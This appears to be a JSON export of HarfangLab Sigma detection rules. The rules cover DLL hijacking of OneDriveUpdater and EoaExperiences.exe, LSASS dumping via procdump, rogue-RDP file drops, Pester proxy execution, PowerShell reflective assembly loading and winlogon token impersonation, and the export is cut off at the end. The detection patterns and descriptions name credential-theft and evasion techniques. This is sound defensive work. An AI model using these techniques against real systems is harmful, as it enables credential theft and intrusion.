"rule_description": "Detects potential Windows DLL Hijacking via HP ColorLaser Jet software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ebe7176-c7a6-4c4b-b556-0b91e3b3949d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096515Z",
"creation_date": "2026-03-23T11:45:34.096517Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096522Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eoaexperiences.yml",
"content": "title: DLL Hijacking via EoaExperiences.exe\nid: 3ebe7176-c7a6-4c4b-b556-0b91e3b3949d\ndescription: |\n Detects potential Windows DLL Hijacking via EoaExperiences.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EoaExperiences.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\d2d1.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ebe7176-c7a6-4c4b-b556-0b91e3b3949d",
"rule_name": "DLL Hijacking via EoaExperiences.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EoaExperiences.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ed4eb53-d0ba-458c-9c03-cd4f967cc00b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627660Z",
"creation_date": "2026-03-23T11:45:34.627662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627667Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#procdump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_procdump.yml",
"content": "title: LSASS Process Memory Dumped via procdump\nid: 3ed4eb53-d0ba-458c-9c03-cd4f967cc00b\ndescription: |\n Detects an attempt to dump the LSASS' process memory using procdump.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to check the process launching Procdump for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#procdump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/05/28\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.ProcDump\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n ProcessOriginalFileName: 'procdump'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ed4eb53-d0ba-458c-9c03-cd4f967cc00b",
"rule_name": "LSASS Process Memory Dumped via procdump",
"rule_description": "Detects an attempt to dump the LSASS' process memory using procdump.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to check the process launching Procdump for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2021-05-28",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ed5fbba-cc68-43af-84dc-c9a39e083aaa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619065Z",
"creation_date": "2026-03-23T11:45:34.619067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619072Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_onedriveupdater.yml",
"content": "title: DLL Hijacking via OneDriveUpdater\nid: 3ed5fbba-cc68-43af-84dc-c9a39e083aaa\ndescription: |\n Detects a potential Windows DLL search order hijacking via OneDriveUpdater.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n The OneDriveStandaloneUpdater tries to load (version.dll) without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'OneDriveStandaloneUpdater.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ed5fbba-cc68-43af-84dc-c9a39e083aaa",
"rule_name": "DLL Hijacking via OneDriveUpdater",
"rule_description": "Detects a potential Windows DLL search order hijacking via OneDriveUpdater.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nThe OneDriveStandaloneUpdater tries to load (version.dll) without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3f29d6d1-df14-4f24-abc0-abe36ac82683",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096091Z",
"creation_date": "2026-03-23T11:45:34.096093Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096098Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/",
"https://attack.mitre.org/techniques/T1566/001/"
],
"name": "1566_001_written_file_mstsc.yml",
"content": "title: Suspicious File Written by mstsc.exe\nid: 3f29d6d1-df14-4f24-abc0-abe36ac82683\ndescription: |\n Detects a suspicious file written by mstsc.exe.\n Using a specially crafted RDP files, attackers may access users local drives through RDP connections and drop malicious files.\n It is recommended to check the maliciousness of the newly created files and if the connection to the RDP server was legitimate.\nreferences:\n - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n - https://attack.mitre.org/techniques/T1566/001/\ndate: 2024/10/29\nmodified: 2025/11/07\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection:\n Path|endswith:\n - '.dll'\n - '.exe'\n - '.com'\n - '.cpl'\n - '.pif'\n - '.js'\n - '.jse'\n - '.vbs'\n - '.vbe'\n - '.ps1'\n - '.cmd'\n - '.bat'\n - '.wsh'\n - '.hta'\n - '.lnk'\n Path|contains:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\Sysvol\\'\n - '?:\\Users\\Public\\'\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\Documents\\PowerShell\\profile.ps1'\n - '\\Documents\\WindowsPowerShell\\profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n - '\\Documents\\PowerShell\\\\*_profile.ps1'\n - '\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n - '?:\\Windows\\system32\\spool\\PRTPROCS\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\'\n - '\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM'\n Kind:\n - 'create'\n - 'write'\n ProcessProcessName: 'mstsc.exe'\n\n filter_firstbytes_folder:\n # Folder\n FirstBytes|startswith: '494e445828'\n Kind: 'write'\n\n filter_firstbytes_empty:\n # Empty\n FirstBytes: ''\n Kind: 'write'\n\n filter_fxs:\n Path|startswith: '?:\\Windows\\System32\\FxsTmp\\'\n\n filter_printer:\n Path|startswith:\n - '?:\\Windows\\System32\\spool\\SERVERS\\'\n - '?:\\Windows\\System32\\spool\\PRINTERS\\'\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\'\n\n filter_mstsc_cache:\n Path|contains: '\\Local\\Microsoft\\Terminal Server Client\\Cache\\'\n\n exclusion_wsl:\n ProcessParentImage: '?:\\Windows\\System32\\lxss\\wslhost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3f29d6d1-df14-4f24-abc0-abe36ac82683",
"rule_name": "Suspicious File Written by mstsc.exe",
"rule_description": "Detects a suspicious file written by mstsc.exe.\nUsing a specially crafted RDP files, attackers may access users local drives through RDP connections and drop malicious files.\nIt is recommended to check the maliciousness of the newly created files and if the connection to the RDP server was legitimate.\n",
"rule_creation_date": "2024-10-29",
"rule_modified_date": "2025-11-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3f42c0d2-ec03-4a3a-9f16-edf623d11e19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087924Z",
"creation_date": "2026-03-23T11:45:34.087926Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087931Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/pester/",
"https://medium.com/@xNEED/pester-ing-lolbas-aadacc075661",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_pester.yml",
"content": "title: Suspicious Pester Execution\nid: 3f42c0d2-ec03-4a3a-9f16-edf623d11e19\ndescription: |\n Detects the suspicious execution of the Pester PowerShell Module.\n The Pester module can be called by the PowerShell command Invoke-Pester and is used to define tests.\n However, the Pester.bat script bundled with power is vulnerable to a proxy execution by injecting a semicolon inside the .bat commandline.\n This legitimate module can be used by attackers to execute arbitrary code to evade detection.\n It is recommended to analyze the executed PowerShell script as well as child processes stemming from PowerShell to look for further malicious actions or contents.\n It is also recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/pester/\n - https://medium.com/@xNEED/pester-ing-lolbas-aadacc075661\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/11/03\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.LOLBin.Pester\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - '{ Invoke-Pester -EnableExit *;?*}'\n - \"\\\\Pester.psm1'; & { Get-Help *;?*}\"\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3f42c0d2-ec03-4a3a-9f16-edf623d11e19",
"rule_name": "Suspicious Pester Execution",
"rule_description": "Detects the suspicious execution of the Pester PowerShell Module.\nThe Pester module can be called by the PowerShell command Invoke-Pester and is used to define tests.\nHowever, the Pester.bat script bundled with power is vulnerable to a proxy execution by injecting a semicolon inside the .bat commandline.\nThis legitimate module can be used by attackers to execute arbitrary code to evade detection.\nIt is recommended to analyze the executed PowerShell script as well as child processes stemming from PowerShell to look for further malicious actions or contents.\nIt is also recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3fb86f3f-25bc-4b7f-916b-aa47252ab35f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623998Z",
"creation_date": "2026-03-23T11:45:34.624000Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://capturethetalent.co.uk/evading-defender-using-reflective-dll-loading/",
"https://attack.mitre.org/techniques/T1620/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1620_powershell_assembly_loader.yml",
"content": "title: .NET Reflection via PowerShell\nid: 3fb86f3f-25bc-4b7f-916b-aa47252ab35f\ndescription: |\n Detects a specific PowerShell command used to load .NET assemblies.\n Attackers can use this technique to load malicious code without writing it to the disk hoping to bypass security solutions.\n It is recommended to verify the legitimacy of this command with the help of PowerShell telemetry.\nreferences:\n - https://capturethetalent.co.uk/evading-defender-using-reflective-dll-loading/\n - https://attack.mitre.org/techniques/T1620/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2023/09/29\nmodified: 2026/03/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - '[System.Reflection.Assembly]::Load([Convert]::FromBase64String('\n - '[System.Reflection.Assembly]::Load($'\n - '[System.Reflection.Assembly]::Load([byte[]]'\n - '[System.Reflection.Assembly]::(?daoL?'\n\n exclusion_share:\n ProcessParentImage|startswith: '\\\\\\\\'\n\n exclusion_forms:\n PowershellCommand|contains: '[System.Windows.Forms.OpenFileDialog]::new()'\n\n # https://www.rudder.io\n exclusion_rudder:\n PowershellCommand|contains|all:\n - '$assembly = [System.Reflection.Assembly]::Load($assemblyBytes)'\n - '[System.AppDomain]::CurrentDomain.remove_AssemblyResolve($onAssemblyResolveEventHandler)'\n - 'function Load-Rudder'\n\n # https://github.com/Mr-Un1k0d3r/ATP-PowerShell-Scripts/blob/main/0e3d6d2d-06cc-486d-9465-9ef3bee75444.ps1\n exclusion_atp1:\n PowershellCommand|contains|all:\n - '$assembly = [System.Reflection.Assembly]::Load($bytes)'\n - 'Loaded DdcHelper library, call RunDdcExe to launch OpenHandleCollector'\n - '$exitCode = $safeExeLauncher.RunDdcExe('\n exclusion_atp2:\n PowershellCommand|contains|all:\n - '# See readme for details'\n - '$bytes[$i] = $bytes[$i] -bxor 0x4'\n - '$assembly = [System.Reflection.Assembly]::Load($bytes)'\n\n # https://www.powershellgallery.com/packages/SqlServerDsc/15.2.0/Content/Modules%5CSqlServerDsc.Common%5CSqlServerDsc.Common.psm1\n exclusion_sqlserver1:\n PowershellCommand|contains|all:\n - 'missing assembly in the module SqlServer this is still needed.'\n - '$connectionInfo = New-Object -TypeName ?Microsoft.SqlServer.Management.Common.ServerConnection? -ArgumentList @(?testclu01a\\SQL2014?)'\n - '$assemblyInformation = [System.Reflection.Assembly]::Load('\n exclusion_sqlserver2:\n PowershellCommand|contains|all:\n - '[System.Reflection.Assembly]::Load('\n - 'Returns the major SQL version for the specific instance.'\n - 'function Get-SqlInstanceMajorVersion'\n\n exclusion_tanium:\n PowershellCommand|contains|all:\n - 'function Load-Assembly {'\n - '$RegPath = ?Registry::HKEY_CURRENT_USER\\Ephemeral?'\n - '[System.Reflection.Assembly]::Load($AssemblyData.ToArray())'\n ProcessAncestors|contains:\n - '|?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumCX.exe|'\n - '|?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe|'\n\n exclusion_function_load_assembly:\n # Hash of the PowerShell Load-Assembly function (internal to PowerShell itself).\n Sha256: '19a89bd7446491a45b3de150803d79e4240c087dd40e9def00c6d950b05e0ede'\n\n exclusion_fujifilm_healthcare:\n PowershellScriptPath: '?:\\Users\\\\*\\AppData\\Local\\Temp\\7z*\\x64\\InstallationScripts\\UtilLib.ps1'\n ProcessAncestors|contains: '|?:\\Windows\\SysWOW64\\cmd.exe|?:\\VOL?\\\\*-Release.exe|?:\\Windows\\explorer.exe|'\n\n exclusion_serviceportalagent:\n ProcessImage:\n - '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\current\\emulator\\MmrAgent.NetFxEmulator.exe'\n - '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\current\\ServicePortalAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_refreshit:\n ProcessParentImage: '?:\\Program Files\\Refresh IT Solutions\\Refresh Deployment Manager PowerShell Host\\Refresh.Common.PowerShell.Host.Server7.exe'\n\n exclusion_citrix:\n - ProcessParentImage: '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - PowershellScriptPath|endswith: '\\UpmConfigCheck.ps1'\n PowershellCommand|contains|all:\n - 'function Import-LogParser {'\n - '# version: Citrix.Cloud.WEM.AdminTool/master/'\n\n exclusion_vscode:\n ProcessParentImage:\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_visualstudio:\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Enterprise\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Dotnet.x64\\ServiceHub.Host.dotnet.x64.exe\n # C:\\Program Files\\Microsoft Visual Studio\\18\\Community\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Extensibility.amd64\\DevHub.exe\n ProcessParentImage|startswith: '?:\\Program Files\\Microsoft Visual Studio\\'\n ProcessParentOriginalFileName:\n - 'ServiceHub.Host.dotnet.x64.dll'\n - 'DevHub.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3fb86f3f-25bc-4b7f-916b-aa47252ab35f",
"rule_name": ".NET Reflection via PowerShell",
"rule_description": "Detects a specific PowerShell command used to load .NET assemblies.\nAttackers can use this technique to load malicious code without writing it to the disk hoping to bypass security solutions.\nIt is recommended to verify the legitimacy of this command with the help of PowerShell telemetry.\n",
"rule_creation_date": "2023-09-29",
"rule_modified_date": "2026-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ff2416a-e32c-45f4-b1ec-f1d61b14d607",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093254Z",
"creation_date": "2026-03-23T11:45:34.093256Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://eversinc33.com/posts/windows-access-tokens/",
"https://attack.mitre.org/techniques/T1134/001/"
],
"name": "t1134_001_winlogon_access_token_impersonation.yml",
"content": "title: Winlogon Access Token Impersonation Detected\nid: 3ff2416a-e32c-45f4-b1ec-f1d61b14d607\ndescription: |\n Detects a suspicious attempt to elevate privileges to local SYSTEM via an access token impersonation of winlogon.exe.\n Token impersonation is a technique through which a Windows local administrator could steal another user's security token in order to impersonate and effectively execute commands as that user.\n It is recommended to analyze the behavior and content of both the parent and the child processes to search for malicious actions.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://eversinc33.com/posts/windows-access-tokens/\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2024/04/19\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1134.001\n - classification.Windows.Source.ProcessAccess\n - 